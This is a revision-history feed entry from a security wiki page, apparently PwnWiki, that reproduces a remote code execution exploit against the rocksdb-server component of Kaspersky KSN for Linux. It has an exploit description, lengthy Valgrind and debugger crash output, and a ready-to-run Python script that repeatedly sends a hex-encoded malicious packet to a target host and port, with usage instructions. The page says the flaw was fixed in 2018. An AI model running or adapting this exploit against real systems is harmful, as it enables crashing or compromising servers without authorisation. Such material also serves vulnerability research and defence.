https://pwnwiki.com/index.php?action=history&feed=atom&title=Kaspersky_KSN_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
Kaspersky KSN 遠程代碼執行漏洞 - Revision history
2026-04-07T06:46:49Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=Kaspersky_KSN_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=1524&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> # Exploit Author: Juan Sacco <jsacco@exploitpack.com> - http://exploitpack.com # Vulnerability found using Exploit Pack v10 # CVE: NotYet # # Exploit description..."
2021-04-11T02:01:50Z
<p>Created page with "==EXP== <pre> # Exploit Author: Juan Sacco <jsacco@exploitpack.com> - http://exploitpack.com # Vulnerability found using Exploit Pack v10 # CVE: NotYet # # Exploit description..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
# Exploit Author: Juan Sacco <jsacco@exploitpack.com> - http://exploitpack.com<br />
# Vulnerability found using Exploit Pack v10<br />
# CVE: NotYet<br />
#<br />
# Exploit description:<br />
# Kaspersky KSN is prone to a remote memory corruption because it<br />
fails to properly filter the input on the remote subscribers, this<br />
leads to heap segments overwrite<br />
# and it leads to remote code execution.<br />
#<br />
#<br />
# Program description:<br />
# Kaspersky KSN for Linux enables cloud-assisted, multi-layered<br />
security for servers and workstations running the Linux operating<br />
system. It delivers reliable protection with minimal impact on<br />
# performance.<br />
# Product homepage: http://kaspersky.com<br />
#<br />
# Example usage: python kasperky.py 192.168.1.1 6349<br />
#<br />
# Exploit history:<br />
# Discovered: Feb 2018<br />
# Reported to Kaspersky: Feb 2018<br />
# Fixed by Kaspersky: March 2018<br />
#<br />
# [!] Valgrind output:<br />
#<br />
# =3314== Invalid write of size 4<br />
# ==3314== at 0x24FA74:<br />
RespObject::SetSimpleString(std::__cxx11::basic_string<char,<br />
std::char_traits<char>, std::allocator<char> > const&) (in<br />
/usr/local/ksn/bin/rocksdb-server)<br />
# ==3314== by 0x241814: RequestParser::Parse(unsigned char*,<br />
unsigned long, std::function<void (RespObject const&)>) (in<br />
/usr/local/ksn/bin/rocksdb-server)<br />
# ==3314== by 0x23B740:<br />
Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,<br />
boost::asio::stream_socket_service<boost::asio::ip::tcp> ><br />
>::HandleRead(boost::system::error_code const&, unsigned long) (in<br />
/usr/local/ksn/bin/rocksdb-server)<br />
# ==3314== by 0x22FF56:<br />
boost::asio::detail::reactive_socket_recv_op<boost::asio::mutable_buffers_1,<br />
boost::_bi::bind_t<void, boost::_mfi::mf2<void,<br />
Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,<br />
boost::asio::stream_socket_service<boost::asio::ip::tcp> > >,<br />
boost::system::error_code const&, unsigned long>,<br />
boost::_bi::list3<boost::_bi::value<Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,<br />
boost::asio::stream_socket_service<boost::asio::ip::tcp> > >*>,<br />
boost::arg<1> (*)(), boost::arg<2> (*)()> ><br />
>::do_complete(boost::asio::detail::task_io_service*,<br />
boost::asio::detail::task_io_service_operation*,<br />
boost::system::error_code const&, unsigned long) (in<br />
/usr/local/ksn/bin/rocksdb-server)<br />
# ==3314== by 0x23647C:<br />
boost::asio::detail::task_io_service::run(boost::system::error_code&)<br />
(in /usr/local/ksn/bin/rocksdb-server)<br />
# ==3314== by 0x1E978A: main (in /usr/local/ksn/bin/rocksdb-server)<br />
# ==3314== Address 0x0 is not stack'd, malloc'd or (recently) free'd<br />
# ==3314==<br />
# ==3314==<br />
# ==3314== Process terminating with default action of signal 11<br />
(SIGSEGV): dumping core<br />
# ==3314== Access not within mapped region at address 0x0<br />
# ==3314== at 0x24FA74:<br />
RespObject::SetSimpleString(std::__cxx11::basic_string<char,<br />
std::char_traits<char>, std::allocator<char> > const&) (in<br />
/usr/local/ksn/bin/rocksdb-server)<br />
# ==3314== by 0x241814: RequestParser::Parse(unsigned char*,<br />
unsigned long, std::function<void (RespObject const&)>) (in<br />
/usr/local/ksn/bin/rocksdb-server)<br />
# ==3314== by 0x23B740:<br />
Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,<br />
boost::asio::stream_socket_service<boost::asio::ip::tcp> ><br />
>::HandleRead(boost::system::error_code const&, unsigned long) (in<br />
/usr/local/ksn/bin/rocksdb-server)<br />
# ==3314== by 0x22FF56:<br />
boost::asio::detail::reactive_socket_recv_op<boost::asio::mutable_buffers_1,<br />
boost::_bi::bind_t<void, boost::_mfi::mf2<void,<br />
Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,<br />
boost::asio::stream_socket_service<boost::asio::ip::tcp> > >,<br />
boost::system::error_code const&, unsigned long>,<br />
boost::_bi::list3<boost::_bi::value<Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,<br />
boost::asio::stream_socket_service<boost::asio::ip::tcp> > >*>,<br />
boost::arg<1> (*)(), boost::arg<2> (*)()> ><br />
>::do_complete(boost::asio::detail::task_io_service*,<br />
boost::asio::detail::task_io_service_operation*,<br />
boost::system::error_code const&, unsigned long) (in<br />
/usr/local/ksn/bin/rocksdb-server)<br />
# ==3314== by 0x23647C:<br />
boost::asio::detail::task_io_service::run(boost::system::error_code&)<br />
(in /usr/local/ksn/bin/rocksdb-server)<br />
# ==3314== by 0x1E978A: main (in /usr/local/ksn/bin/rocksdb-server)<br />
# ==3314== If you believe this happened as a result of a stack<br />
# ==3314== overflow in your program's main thread (unlikely but<br />
# ==3314== possible), you can try to increase the size of the<br />
# ==3314== main thread stack using the --main-stacksize= flag.<br />
# ==3314== The main thread stack size used in this run was 8388608.<br />
# ==3314==<br />
# ==3314== HEAP SUMMARY:<br />
# ==3314== in use at exit: 769,426 bytes in 7,522 blocks<br />
# ==3314== total heap usage: 15,342 allocs, 7,820 frees, 1,354,534<br />
bytes allocated<br />
# ==3314==<br />
# ==3314== LEAK SUMMARY:<br />
# ==3314== definitely lost: 8 bytes in 1 blocks<br />
# ==3314== indirectly lost: 0 bytes in 0 blocks<br />
# ==3314== possibly lost: 5,328 bytes in 9 blocks<br />
# ==3314== still reachable: 764,090 bytes in 7,512 blocks<br />
# ==3314== of which reachable via heuristic:<br />
# ==3314== newarray : 8,264 bytes in 4 blocks<br />
# ==3314== suppressed: 0 bytes in 0 blocks<br />
#<br />
# [!] Debugger output:<br />
#<br />
# [----------------------------------registers-----------------------------------]<br />
# RAX: 0x7ffe127426f0 --> 0x7ffe12742800 --> 0x7f7ee28fb1c0 --><br />
0x7f7ee1d4f090 --> 0x7f7ee1894760<br />
(<_ZN5boost4asio6detail15task_io_serviceD2Ev>: push r13)<br />
# RBX: 0x0<br />
# RCX: 0x7f7ee2913000 --> 0x0<br />
# RDX: 0xffffffffffdf6bf0<br />
# RSI: 0x7ffe127426e0 --> 0x7ffe127426f0 --> 0x7ffe12742800 --><br />
0x7f7ee28fb1c0 --> 0x7f7ee1d4f090 --> 0x7f7ee1894760<br />
(<_ZN5boost4asio6detail15task_io_serviceD2Ev>: push r13)<br />
# RDI: 0x0<br />
# RBP: 0x7f7ee28f5338 --> 0x81<br />
# RSP: 0x7ffe127425c0 --> 0x7f7ee2924198 --> 0x7f7ee28f5320 --> 0x5<br />
# RIP: 0x7f7ee18b3a74<br />
(<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+4>:<br />
mov DWORD PTR [rdi],0x1)<br />
# R8 : 0x0<br />
# R9 : 0x7<br />
# R10: 0x2<br />
# R11: 0x7f7ee00276d0 --> 0xfffcdfc0fffcd800<br />
# R12: 0x29b<br />
# R13: 0x0<br />
# R14: 0x7ffe127426e0 --> 0x7ffe127426f0 --> 0x7ffe12742800 --><br />
0x7f7ee28fb1c0 --> 0x7f7ee1d4f090 --> 0x7f7ee1894760<br />
(<_ZN5boost4asio6detail15task_io_serviceD2Ev>: push r13)<br />
# R15: 0x7f7ee2924562 --> 0x543ffb3c7ef1cd2b<br />
# EFLAGS: 0x10207 (CARRY PARITY adjust zero sign trap INTERRUPT<br />
direction overflow)<br />
# [-------------------------------------code-------------------------------------]<br />
# 0x7f7ee18b3a6e: xchg ax,ax<br />
# 0x7f7ee18b3a70<br />
<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE>:<br />
push rbx<br />
# 0x7f7ee18b3a71<br />
<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+1>:<br />
mov rbx,rdi<br />
# => 0x7f7ee18b3a74<br />
<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+4>:<br />
mov DWORD PTR [rdi],0x1<br />
# 0x7f7ee18b3a7a<br />
<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+10>:<br />
lea rdi,[rdi+0x10]<br />
# 0x7f7ee18b3a7e<br />
<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+14>:<br />
call 0x7f7ee184a8a0<br />
<_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE9_M_assignERKS4_@plt><br />
# 0x7f7ee18b3a83<br />
<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+19>:<br />
mov BYTE PTR [rbx+0x4],0x0<br />
# 0x7f7ee18b3a87<br />
<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+23>:<br />
pop rbx<br />
# [------------------------------------stack-------------------------------------]<br />
# 0000| 0x7ffe127425c0 --> 0x7f7ee2924198 --> 0x7f7ee28f5320 --> 0x5<br />
# 0008| 0x7ffe127425c8 --> 0x7f7ee18a5815<br />
(<_ZN13RequestParser5ParseEPhmSt8functionIFvRK10RespObjectEE+3317>:<br />
mov rdi,QWORD PTR [rsp+0x110])<br />
# 0016| 0x7ffe127425d0 --> 0x7f7ee2901c08 --> 0x5a849d1562a512bd<br />
# 0024| 0x7ffe127425d8 --> 0x7f7ee29242c8 --> 0x10061030045<br />
# 0032| 0x7ffe127425e0 --> 0x361<br />
# 0040| 0x7ffe127425e8 --> 0x0<br />
# 0048| 0x7ffe127425f0 --> 0x7ffe127426e0 --> 0x7ffe127426f0 --><br />
0x7ffe12742800 --> 0x7f7ee28fb1c0 --> 0x7f7ee1d4f090 (--> ...)<br />
# 0056| 0x7ffe127425f8 --> 0x7ffe127426a0 --> 0x0<br />
# [------------------------------------------------------------------------------]<br />
# Legend: code, data, rodata, value<br />
# Stopped reason: SIGSEGV<br />
# 0x00007f7ee18b3a74 in<br />
RespObject::SetSimpleString(std::__cxx11::basic_string<char,<br />
std::char_traits<char>, std::allocator<char> > const&) ()<br />
# gdb-peda$ where<br />
# #0 0x00007f7ee18b3a74 in<br />
RespObject::SetSimpleString(std::__cxx11::basic_string<char,<br />
std::char_traits<char>, std::allocator<char> > const&) ()<br />
# #1 0x00007f7ee18a5815 in RequestParser::Parse(unsigned char*,<br />
unsigned long, std::function<void (RespObject const&)>) ()<br />
# #2 0x00007f7ee189f741 in<br />
Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,<br />
boost::asio::stream_socket_service<boost::asio::ip::tcp> ><br />
>::HandleRead(boost::system::error_code const&, unsigned long<br />
<br />
import binascii<br />
import sys<br />
import socket<br />
import time<br />
<br />
def rocksDB(target,port):<br />
try:<br />
while 1:<br />
# Open socket<br />
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br />
# Set reuse ON<br />
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)<br />
# Bind port<br />
s.connect((target, port))<br />
print("[" + time.strftime('%a %H:%M:%S') + "]" + " - " +<br />
"Connected to:"), target, port<br />
print("[" + time.strftime('%a %H:%M:%S') + "]" + " - " +<br />
"Establishing connection.. ")<br />
packet =<br />
binascii.unhexlify(b'4500036100010000400679947f0000017f000001001419100000000000000000500220009e1700005ce528736b32895950f96218411ca66c9b0842c995eacbfc3eacd8187d3aa8488e1cf1f18491606b9c400c42ec88e7399baa7c3b0bca43de853c74d2fbb2c08c9868ad9688b815d6e5a913937ff05217e18ff28d379fa6985204f7f529990a675d2fc70e1a7dbca8334e4faf30ea31cb33f0c1fabbfc92fbaf20d7e63cfe65ee95711a80a406c26b6e60335d74a02b42a454bc6bbcf5153cb20b77c9686b2fff994b224a3dc5fcbd12a562159d845a8b039abf971bb7c79fe74ca7055560c9c513377881b7a033eb797738fc119758f4c6ea1a960cab1299f5b1a6e99e0be889d8bdf05edc7ca6f14a48d35a5f747887e2330a5cc8b722257ecf32987ad1e24aa56c4685fdae028ca7689bdb66b3d951b8021a34a04114f4208c3f9a6d66bcb7cbeec80a716d69375a88202f3cac2562c9595095c61e693080edd5a3318084d974a2130d5cfe439903d6d5b9b3b553143831c6e01f286da4a2339c91cfce00fe17d7584153ab93e723ce2e859d7aaa9f9574af2dbb4ca4d9f8c8f39f4e89a790e5e4e74bbfd44a721594362f1c71cc48721014f451b837aff64624ea8fbc767c50ada655f23c87195b49b854c3e0d69f1585b663a02ad33cfdfd78c43e3531d6802b7271b7518ded3d93338084ca0e7982dc7c76d82c1b0fed91e5dc567262f46e3bd71b66f9d8283784d666a2be99e397a4abe9495168c880d7f371b87f44b38e61d836ccad8afc8c99518fa1240ab5a2a0685a9d450f4b44fefcc6b64ce8f6ec836922670b31ebf62ea5933e272a62ac8ff2c79d8f15a1220a37e5535ec0998aaf8af2f9d0a0f75e96fad8e8b1ae0e2fff70d831c501048644f700527d61d1f6cb177948e0ebea8d4a01fa9c7ca2c4b3472bcdf17e3cfb3f54fb791a43f114514b6821390d2c16e23ff9ffb0b0caa508b2952b0a497a24ce0d8ad05734111034a71d57a624855b95594b7f158903f03c02213c8de27644a2026de0c7477f1550f9f39450718ddf185eb9c5f9fc7b545c838970c4f7e87b69c570a873d8f64fe08ed23c7b8275f8bf54f080508bb244fbf3dc852968bd8a63a8787c8e496508c597ae9f617bfb096bebf94cbb736a6438163f61479816da9d88e2a3ea6b50a828d9c2c6f51f34e29f4fe588a41e5e3a53515d474a5a52b357')<br />
# Log the packet in hexa and timestamp<br />
fileLog = target + ".log"<br />
logPacket = open("exploit.log", "w+")<br />
logPacket.write("["+time.strftime('%a %H:%M:%S')+"]"+ " -<br />
Writing to socket: " + binascii.hexlify(bytes(packet))+"\n")<br />
logPacket.close()<br />
<br />
# Write bytecodes to socket<br />
print("["+time.strftime('%a %H:%M:%S')+"]"+" - "+"Writing<br />
to socket: ")<br />
s.send(bytes(packet))<br />
# Packet sent:<br />
print(bytes(packet))<br />
try:<br />
data = s.recv(4096)<br />
print("[" + time.strftime('%a %H:%M:%S') + "]" + " -<br />
"+ "Data received: '{msg}'".format(msg=data))<br />
except socket.error, e:<br />
print '[!] Sorry, No data available'<br />
continue<br />
s.close()<br />
except socket.error as error:<br />
print error<br />
print "Sorry, something went wrong!"<br />
<br />
def howtouse():<br />
print "Usage: kaspersky.py hostname port"<br />
print "[*] Mandatory arguments:"<br />
print "[-] Specify a hostname / port"<br />
sys.exit(-1)<br />
<br />
if __name__ == "__main__":<br />
try:<br />
# Set target<br />
target = sys.argv[1]<br />
port = int(sys.argv[2])<br />
<br />
print "[*] Kaspersky KSN RCE Exploit by Juan Sacco<br />
<jsacco@exploitpack.com "<br />
rocksDB(target, port)<br />
except IndexError:<br />
howtouse()<br />
</pre></div>
Pwnwiki